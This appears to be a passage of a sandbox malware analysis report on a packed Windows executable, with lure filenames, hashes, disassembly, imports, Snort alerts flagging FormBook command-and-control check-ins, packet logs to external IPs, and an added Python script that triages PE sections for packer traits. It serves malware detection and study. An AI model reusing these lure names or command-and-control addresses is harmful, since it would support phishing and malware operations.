                                                                     | AAXIFJn78w.exe | Get hash | malicious | Browse | 23.226.65.187
                                                                     | Debt-Details-1078370504-03052021.xls | Get hash | malicious | Browse | 107.178.101.181
                                                                     | Debt-Details-1078370504-03052021.xls | Get hash | malicious | Browse | 107.178.101.181
                                                                     | 6a0000.exe | Get hash | malicious | Browse | 162.213.211.87
                                                                     | Payment.xlsx | Get hash | malicious | Browse | 104.161.84.118
                                                                     | Scan #84462.xlsm | Get hash | malicious | Browse | 107.178.101.185
                                                                     | 9VZe9OnL4V.exe | Get hash | malicious | Browse | 104.161.84.118
                                                                     | PO 9494843.xlsx | Get hash | malicious | Browse | 104.161.84.118
                                                                     | shipment document pdf.exe | Get hash | malicious | Browse | 23.226.65.211
                                                                     | Swift_Payment_jpeg.exe | Get hash | malicious | Browse | 107.189.162.104
                                                                     | ORDER pdf.exe | Get hash | malicious | Browse | 23.226.65.211
                                                                     | Detailed #460988.xlsm | Get hash | malicious | Browse | 107.178.101.250
                                                                     | Detailed #460988.xlsm | Get hash | malicious | Browse | 107.178.101.250
                                                                     | Detailed #460988.xlsm | Get hash | malicious | Browse | 107.178.101.250
                                                                     | Invoice pdf.exe | Get hash | malicious | Browse | 23.226.65.211
                                                                    MISSDOMAINSE | 46578-TR.exe | Get hash | malicious | Browse | 94.46.9.37
                                                                     | MV Sky Marine.xlsx | Get hash | malicious | Browse | 94.46.58.25
                                                                     | 4TYyYEdhtj.exe | Get hash | malicious | Browse | 94.46.58.25
                                                                     | MV Sky Marine_pdf.exe | Get hash | malicious | Browse | 94.46.58.25
                                                                     | z2xQEFs54b.exe | Get hash | malicious | Browse | 185.76.64.223
                                                                     | 3yhnaDfaxn.exe | Get hash | malicious | Browse | 185.76.64.223
                                                                    BODIS-NJUS | PaymentAdvice.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | 0BAdCQQVtP.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | RFQ_ V-21-Kiel-050-D02.xlsx | Get hash | malicious | Browse | 199.59.242.153
                                                                     | New Order.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | ALPHA SCIENCE, INC.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | payment.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | Order.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | PaymentInvoice.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | SB210330034.pdf.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | swift_76567643.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | Request an Estimate_2021_04_01.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | 2021-04-01.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | onbgX3WswF.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | ARBmDNJS7m.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | Bista_094924,ppdf.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | PO.1183.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | Scan-45679.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | TT Remittance Copy.PDF.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | DK Purchase Order 2021 - 00041.exe | Get hash | malicious | Browse | 199.59.242.153
                                                                     | 9tRIEZUd1j.exe | Get hash | malicious | Browse | 199.59.242.153

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    No created / dropped files found

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):6.958502033101644
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                    • Clipper DOS Executable (2020/12) 0.02%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • VXD Driver (31/22) 0.00%
                                                                    File name:RCS76393.exe
                                                                    File size:386560
                                                                    MD5:1ab1c3129fa0764ea0702da70f3ef569
                                                                    SHA1:ee8cd1946b58390f4599056df1472d01cf85a543
                                                                    SHA256:5d1870672eff4e2ec6d699d654d5268051f7a56f8ca991fefa538eeef380a89c
                                                                    SHA512:58bb904dc8d4435e232936f2972037dbf8b214559d0156c5d5275fdc3547a25e7ce92910459cd7f5c737641df74078e7060f0825df79b99203c2fb5033a0501c
                                                                    SSDEEP:6144:jK3TcyLImYxn3QDQEachg1e4VqOWB4hqynGEpNA:jK3Td093QDQEachGeZ8Gs2
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L..."Z.^...........

                                                                    File Icon

                                                                    Icon Hash:8692f0c4c4ccb2ce

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4041a3
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5EE25A22 [Thu Jun 11 16:21:54 2020 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:0
                                                                    File Version Major:5
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:9c90aa63bb435d1aab6db36d5bf4ee01

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007F1EB8BC4ECDh
                                                                    jmp 00007F1EB8BBD9BEh
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    test ecx, 00000003h
                                                                    je 00007F1EB8BBDB66h
                                                                    mov al, byte ptr [ecx]
                                                                    add ecx, 01h
                                                                    test al, al
                                                                    je 00007F1EB8BBDB90h
                                                                    test ecx, 00000003h
                                                                    jne 00007F1EB8BBDB31h
                                                                    add eax, 00000000h
                                                                    lea esp, dword ptr [esp+00000000h]
                                                                    lea esp, dword ptr [esp+00000000h]
                                                                    mov eax, dword ptr [ecx]
                                                                    mov edx, 7EFEFEFFh
                                                                    add edx, eax
                                                                    xor eax, FFFFFFFFh
                                                                    xor eax, edx
                                                                    add ecx, 04h
                                                                    test eax, 81010100h
                                                                    je 00007F1EB8BBDB2Ah
                                                                    mov eax, dword ptr [ecx-04h]
                                                                    test al, al
                                                                    je 00007F1EB8BBDB74h
                                                                    test ah, ah
                                                                    je 00007F1EB8BBDB66h
                                                                    test eax, 00FF0000h
                                                                    je 00007F1EB8BBDB55h
                                                                    test eax, FF000000h
                                                                    je 00007F1EB8BBDB44h
                                                                    jmp 00007F1EB8BBDB0Fh
                                                                    lea eax, dword ptr [ecx-01h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-02h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-03h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-04h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    mov edi, edi
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 20h
                                                                    mov eax, dword ptr [ebp+08h]
                                                                    push esi
                                                                    push edi
                                                                    push 00000008h
                                                                    pop ecx
                                                                    mov esi, 03DAD300h
                                                                    lea edi, dword ptr [ebp-20h]
                                                                    rep movsd
                                                                    mov dword ptr [ebp-08h], eax
                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                    pop edi
                                                                    mov dword ptr [ebp-04h], eax
                                                                    pop esi
                                                                    test eax, eax
                                                                    je 00007F1EB8BBDB4Eh
                                                                    test byte ptr [eax], 00000008h
                                                                    je 00007F1EB8BBDB49h
                                                                    mov dword ptr [ebp+00h], 00000000h

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x39b18a0        0x67          .new
IMAGE_DIRECTORY_ENTRY_IMPORT          0x39b0d84        0x3c          .new
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x39b2000        0x2ca0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x39b5000        0x1a9c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x39afa58        0x40          .new
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x39ad000        0x1e8         .new
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x4ab43       0x4ac00   False     0.740110263378   data       7.49545295007  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data   0x4c000          0x395d288     0x1c00    unknown   unknown          unknown    unknown        IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.jidiy  0x39aa000        0x1           0x200     False     0.02734375       data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.wahe   0x39ab000        0x1179        0x400     False     0.0166015625     data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.new    0x39ad000        0x4907        0x4a00    False     0.372096706081   data       5.4613035653   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x39b2000        0x2ca0        0x2e00    False     0.558848505435   data       5.00204478072  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x39b5000        0x9918        0x9a00    False     0.146027800325   data       1.75035156037  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
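
The section table is what drives several of the packer-related signatures in this report: an executable .text with entropy near 7.5, a .data section whose virtual size (0x395d288) is thousands of times its raw size (0x1c00), and section names no linker emits (.jidiy, .wahe, .new). The script below is an added example for this page, not part of the Joe Sandbox report or its tooling. It walks the PE headers with the standard library only, computes per-section Shannon entropy, and flags those three traits plus writable-and-executable sections. The file it runs on is constructed in make_sample_pe(): a PE32 whose first three sections copy the names, sizes and characteristics of .text, .data and .jidiy from the table above, with deterministic pseudo-random bytes standing in for the packed code. The thresholds (entropy 7.0, 16x inflation) are assumptions, not values the report states.

```python
"""Section-table triage for a PE file using only the standard library.

Added example for this report page, not part of the sandbox report or its
tooling. parse_sections() reads the real header layout; make_sample_pe()
builds a constructed PE32 mimicking this sample's .text/.data/.jidiy.
Thresholds in triage() are assumptions.
"""
import hashlib
import math
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names a linker normally emits; anything else is worth a second look.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".CRT", ".textbss"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list:
    """Read IMAGE_SECTION_HEADERs straight from the COFF/optional header layout."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    off = coff + 20 + opt_size  # section table follows the optional header
    sections = []
    for _ in range(n_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", pe, off)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "raw_size": raw_size,
                         "entropy": shannon_entropy(raw), "chars": chars})
        off += 40
    return sections


def triage(sections, entropy_threshold=7.0, inflate_ratio=16) -> dict:
    """Return {section name: [findings]} for sections that look packer-made."""
    findings = {}
    for s in sections:
        notes = []
        executable = bool(s["chars"] & IMAGE_SCN_MEM_EXECUTE)
        writable = bool(s["chars"] & IMAGE_SCN_MEM_WRITE)
        if executable and s["entropy"] >= entropy_threshold:
            notes.append(f"executable section with entropy {s['entropy']:.2f}: compressed or encrypted code")
        if s["raw_size"] and s["vsize"] > s["raw_size"] * inflate_ratio:
            notes.append(f"VirtualSize 0x{s['vsize']:x} is {s['vsize'] // s['raw_size']}x SizeOfRawData 0x{s['raw_size']:x}: room to unpack into")
        if executable and writable:
            notes.append("section is both writable and executable")
        if s["name"] not in STANDARD_SECTIONS:
            notes.append("non-standard section name")
        if notes:
            findings[s["name"]] = notes
    return findings


def pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler: SHA-256 in counter mode."""
    out = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(n // 32 + 1))
    return out[:n]


def make_sample_pe() -> bytes:
    """Constructed PE32 copying this sample's first three sections (not the real file)."""
    layout = [  # name, VirtualSize, VirtualAddress, raw bytes, Characteristics
        (b".text", 0x4ab43, 0x1000, pseudo_random(0x4ac00),
         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".data", 0x395d288, 0x4c000, b"\0" * 0x1c00,
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        (b".jidiy", 0x1, 0x39aa000, b"\0" * 0x200,
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    optional = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)  # PE32 magic, rest zeroed
    headers_len = 0x40 + 4 + 20 + len(optional) + 40 * len(layout)
    raw_ptr = (headers_len + 0x1FF) & ~0x1FF  # 0x200 file alignment
    table, blobs = b"", b""
    for name, vsize, va, raw, chars in layout:
        table += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(raw), raw_ptr + len(blobs), 0, 0, 0, 0, chars)
        blobs += raw
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0x5EE25A22, 0, 0, len(optional), 0x0102)
    image = dos + b"PE\0\0" + coff + optional + table
    return image + b"\0" * (raw_ptr - len(image)) + blobs


if __name__ == "__main__":
    secs = parse_sections(make_sample_pe())
    for s in secs:
        print(f"{s['name']:<8}VA 0x{s['va']:x}  VSize 0x{s['vsize']:x}  Raw 0x{s['raw_size']:x}  entropy {s['entropy']:.2f}")
    for name, notes in triage(secs).items():
        print(name, "->", "; ".join(notes))
```

Run against a real file with parse_sections(open(path, "rb").read()). The inflation check is the one most specific to this sample: a section that is 7 KiB on disk but reserves 60 MiB of address space exists to receive an unpacked payload, and no compiler produces that layout on its own.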

Resources

Name             RVA        Size    Type                                                     Language  Country
RT_CURSOR        0x39b3498  0x134   data
RT_ICON          0x39b23a0  0x10a8  data
RT_STRING        0x39b37b8  0x148   data
RT_STRING        0x39b3900  0x304   data
RT_STRING        0x39b3c08  0x510   data
RT_STRING        0x39b4118  0x502   data
RT_STRING        0x39b4620  0x424   data
RT_STRING        0x39b4a48  0xe6    data
RT_STRING        0x39b4b30  0x16e   data
RT_ACCELERATOR   0x39b3460  0x18    data
RT_GROUP_CURSOR  0x39b35d0  0x14    Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON    0x39b3448  0x14    data
RT_VERSION       0x39b35e8  0x1d0   data
None             0x39b3478  0xa     data
None             0x39b3488  0xa     data

Imports

DLL           Import
KERNEL32.dll  HeapReAlloc, RemoveVectoredExceptionHandler, EnumDateFormatsExW, FindResourceExW, WriteConsoleOutputCharacterA, LoadResource, SetWaitableTimer, GetCurrentProcess, HeapFree, GetModuleHandleExW, GlobalLock, CancelWaitableTimer, LockFile, SetTapeParameters, GetModuleHandleW, EnumCalendarInfoExW, TzSpecificLocalTimeToSystemTime, GetLocaleInfoW, GetSystemTimeAdjustment, InterlockedPopEntrySList, GetFileAttributesA, GetCompressedFileSizeA, GetTimeZoneInformation, GetEnvironmentVariableA, DisconnectNamedPipe, VirtualUnlock, GetConsoleAliasesW, GetProcAddress, GetAtomNameA, LocalAlloc, AddAtomA, GlobalFindAtomW, GlobalUnWire, lstrcatW, FatalExit, GetFileTime, GetConsoleCursorInfo, LocalFree, LCMapStringW, SetEnvironmentVariableA, CompareStringW, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, GetLastError, EnterCriticalSection, LeaveCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FatalAppExitA, VirtualAlloc, MultiByteToWideChar, CloseHandle, CreateFileA, InitializeCriticalSectionAndSpinCount, HeapSize, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, LoadLibraryA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, FlushFileBuffers, ReadFile, SetEndOfFile, GetProcessHeap, CompareStringA, GetModuleHandleA
USER32.dll    GetProcessDefaultLayout

Exports

Name      Ordinal  Address
Lolipops  1        0x4448a0
NoMore    2        0x444880
Robin     3        0x444890

Version Infos

Description     Data
InternalName    calimatimodunads.exe
FileVersion     s7.0.2.54
LegalCopyright  sVsekda
ProductVersion  s7.0.21.45
Translation     0x0129 0x062b

                                                                    Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
04/08/21-12:46:58.836959  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49741        80         192.168.2.6     198.185.159.144
04/08/21-12:46:58.836959  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49741        80         192.168.2.6     198.185.159.144
04/08/21-12:46:58.836959  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49741        80         192.168.2.6     198.185.159.144
04/08/21-12:47:09.209527  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49742      34.102.136.180  192.168.2.6

                                                                    Network Port Distribution

TCP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
Apr 8, 2021 12:46:38.828039885 CEST  49723  80  192.168.2.6  104.160.174.177
Apr 8, 2021 12:46:41.838196039 CEST  49723  80  192.168.2.6  104.160.174.177
Apr 8, 2021 12:46:42.010420084 CEST  80  49723  104.160.174.177  192.168.2.6
Apr 8, 2021 12:46:42.011430979 CEST  49723  80  192.168.2.6  104.160.174.177
Apr 8, 2021 12:46:42.498070002 CEST  49723  80  192.168.2.6  104.160.174.177
Apr 8, 2021 12:46:42.671731949 CEST  80  49723  104.160.174.177  192.168.2.6
Apr 8, 2021 12:46:43.010082960 CEST  49723  80  192.168.2.6  104.160.174.177
Apr 8, 2021 12:46:43.221426964 CEST  80  49723  104.160.174.177  192.168.2.6
Apr 8, 2021 12:46:43.287656069 CEST  80  49723  104.160.174.177  192.168.2.6
Apr 8, 2021 12:46:43.287707090 CEST  80  49723  104.160.174.177  192.168.2.6
Apr 8, 2021 12:46:43.287720919 CEST  80  49723  104.160.174.177  192.168.2.6
Apr 8, 2021 12:46:43.287738085 CEST  80  49723  104.160.174.177  192.168.2.6
Apr 8, 2021 12:46:43.287756920 CEST  80  49723  104.160.174.177  192.168.2.6
Apr 8, 2021 12:46:43.287769079 CEST  80  49723  104.160.174.177  192.168.2.6
Apr 8, 2021 12:46:43.287785053 CEST  80  49723  104.160.174.177  192.168.2.6
Apr 8, 2021 12:46:43.287884951 CEST  49723  80  192.168.2.6  104.160.174.177
Apr 8, 2021 12:46:43.287955999 CEST  49723  80  192.168.2.6  104.160.174.177
Apr 8, 2021 12:46:43.287972927 CEST  49723  80  192.168.2.6  104.160.174.177
Apr 8, 2021 12:46:48.174196005 CEST  49726  80  192.168.2.6  104.161.84.100
Apr 8, 2021 12:46:48.335020065 CEST  80  49726  104.161.84.100  192.168.2.6
Apr 8, 2021 12:46:48.335206032 CEST  49726  80  192.168.2.6  104.161.84.100
Apr 8, 2021 12:46:48.335388899 CEST  49726  80  192.168.2.6  104.161.84.100
Apr 8, 2021 12:46:48.495990038 CEST  80  49726  104.161.84.100  192.168.2.6
Apr 8, 2021 12:46:48.497931004 CEST  80  49726  104.161.84.100  192.168.2.6
Apr 8, 2021 12:46:48.497960091 CEST  80  49726  104.161.84.100  192.168.2.6
Apr 8, 2021 12:46:48.498164892 CEST  49726  80  192.168.2.6  104.161.84.100
Apr 8, 2021 12:46:48.498274088 CEST  49726  80  192.168.2.6  104.161.84.100
Apr 8, 2021 12:46:48.658807993 CEST  80  49726  104.161.84.100  192.168.2.6
Apr 8, 2021 12:46:58.729919910 CEST  49741  80  192.168.2.6  198.185.159.144
Apr 8, 2021 12:46:58.836591959 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.836755037 CEST  49741  80  192.168.2.6  198.185.159.144
Apr 8, 2021 12:46:58.836958885 CEST  49741  80  192.168.2.6  198.185.159.144
Apr 8, 2021 12:46:58.943339109 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.951539993 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.951575041 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.951591969 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.951605082 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.951620102 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.951636076 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.951647997 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.951667070 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.951689959 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.951697111 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:58.951709986 CEST  49741  80  192.168.2.6  198.185.159.144
Apr 8, 2021 12:46:58.951854944 CEST  49741  80  192.168.2.6  198.185.159.144
Apr 8, 2021 12:46:58.951930046 CEST  49741  80  192.168.2.6  198.185.159.144
Apr 8, 2021 12:46:59.058216095 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:59.058240891 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:59.058259964 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:59.058274984 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:59.058293104 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:59.058310032 CEST  49741  80  192.168.2.6  198.185.159.144
Apr 8, 2021 12:46:59.058310986 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:59.058326006 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:59.058422089 CEST  80  49741  198.185.159.144  192.168.2.6
Apr 8, 2021 12:46:59.058439016 CEST  49741  80  192.168.2.6  198.185.159.144
Apr 8, 2021 12:46:59.058764935 CEST  49741  80  192.168.2.6  198.185.159.144
Apr 8, 2021 12:47:09.080147982 CEST  49742  80  192.168.2.6  34.102.136.180
Apr 8, 2021 12:47:09.092434883 CEST  80  49742  34.102.136.180  192.168.2.6
Apr 8, 2021 12:47:09.092621088 CEST  49742  80  192.168.2.6  34.102.136.180
Apr 8, 2021 12:47:09.092782021 CEST  49742  80  192.168.2.6  34.102.136.180
Apr 8, 2021 12:47:09.104984999 CEST  80  49742  34.102.136.180  192.168.2.6
Apr 8, 2021 12:47:09.209527016 CEST  80  49742  34.102.136.180  192.168.2.6
Apr 8, 2021 12:47:09.209676981 CEST  80  49742  34.102.136.180  192.168.2.6
Apr 8, 2021 12:47:09.209800959 CEST  49742  80  192.168.2.6  34.102.136.180
Apr 8, 2021 12:47:09.209867001 CEST  49742  80  192.168.2.6  34.102.136.180
Apr 8, 2021 12:47:09.222744942 CEST  80  49742  34.102.136.180  192.168.2.6
Apr 8, 2021 12:47:14.550185919 CEST  49743  80  192.168.2.6  193.168.194.206
Apr 8, 2021 12:47:17.559937954 CEST  49743  80  192.168.2.6  193.168.194.206
Apr 8, 2021 12:47:17.752141953 CEST  80  49743  193.168.194.206  192.168.2.6
Apr 8, 2021 12:47:17.752445936 CEST  49743  80  192.168.2.6  193.168.194.206
Apr 8, 2021 12:47:17.752739906 CEST  49743  80  192.168.2.6  193.168.194.206
Apr 8, 2021 12:47:17.944873095 CEST  80  49743  193.168.194.206  192.168.2.6
Apr 8, 2021 12:47:18.263333082 CEST  49743  80  192.168.2.6  193.168.194.206
Apr 8, 2021 12:47:18.495343924 CEST  80  49743  193.168.194.206  192.168.2.6
Apr 8, 2021 12:47:24.087763071 CEST  80  49743  193.168.194.206  192.168.2.6
Apr 8, 2021 12:47:24.087795973 CEST  80  49743  193.168.194.206  192.168.2.6
Apr 8, 2021 12:47:24.087848902 CEST  49743  80  192.168.2.6  193.168.194.206
Apr 8, 2021 12:47:24.087867975 CEST  49743  80  192.168.2.6  193.168.194.206
Apr 8, 2021 12:47:33.582299948 CEST  49749  80  192.168.2.6  199.59.242.153
Apr 8, 2021 12:47:33.692231894 CEST  80  49749  199.59.242.153  192.168.2.6
Apr 8, 2021 12:47:33.692333937 CEST  49749  80  192.168.2.6  199.59.242.153
Apr 8, 2021 12:47:33.692498922 CEST  49749  80  192.168.2.6  199.59.242.153
Apr 8, 2021 12:47:33.802305937 CEST  80  49749  199.59.242.153  192.168.2.6
Apr 8, 2021 12:47:33.802937031 CEST  80  49749  199.59.242.153  192.168.2.6
Apr 8, 2021 12:47:33.803009987 CEST  80  49749  199.59.242.153  192.168.2.6
Apr 8, 2021 12:47:33.803033113 CEST  80  49749  199.59.242.153  192.168.2.6
Apr 8, 2021 12:47:33.803052902 CEST  80  49749  199.59.242.153  192.168.2.6
Apr 8, 2021 12:47:33.803070068 CEST  80  49749  199.59.242.153  192.168.2.6
Apr 8, 2021 12:47:33.803193092 CEST  49749  80  192.168.2.6  199.59.242.153
Apr 8, 2021 12:47:33.803306103 CEST  49749  80  192.168.2.6  199.59.242.153
Apr 8, 2021 12:47:38.885835886 CEST  49750  80  192.168.2.6  85.159.66.93
Apr 8, 2021 12:47:38.937621117 CEST  80  49750  85.159.66.93  192.168.2.6
Apr 8, 2021 12:47:38.938090086 CEST  49750  80  192.168.2.6  85.159.66.93
Apr 8, 2021 12:47:38.938357115 CEST  49750  80  192.168.2.6  85.159.66.93
Apr 8, 2021 12:47:38.990061045 CEST  80  49750  85.159.66.93  192.168.2.6
Apr 8, 2021 12:47:38.990087032 CEST  80  49750  85.159.66.93  192.168.2.6
Apr 8, 2021 12:47:38.990317106 CEST  49750  80  192.168.2.6  85.159.66.93
Apr 8, 2021 12:47:38.990350962 CEST  49750  80  192.168.2.6  85.159.66.93
Apr 8, 2021 12:47:39.041932106 CEST  80  49750  85.159.66.93  192.168.2.6
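
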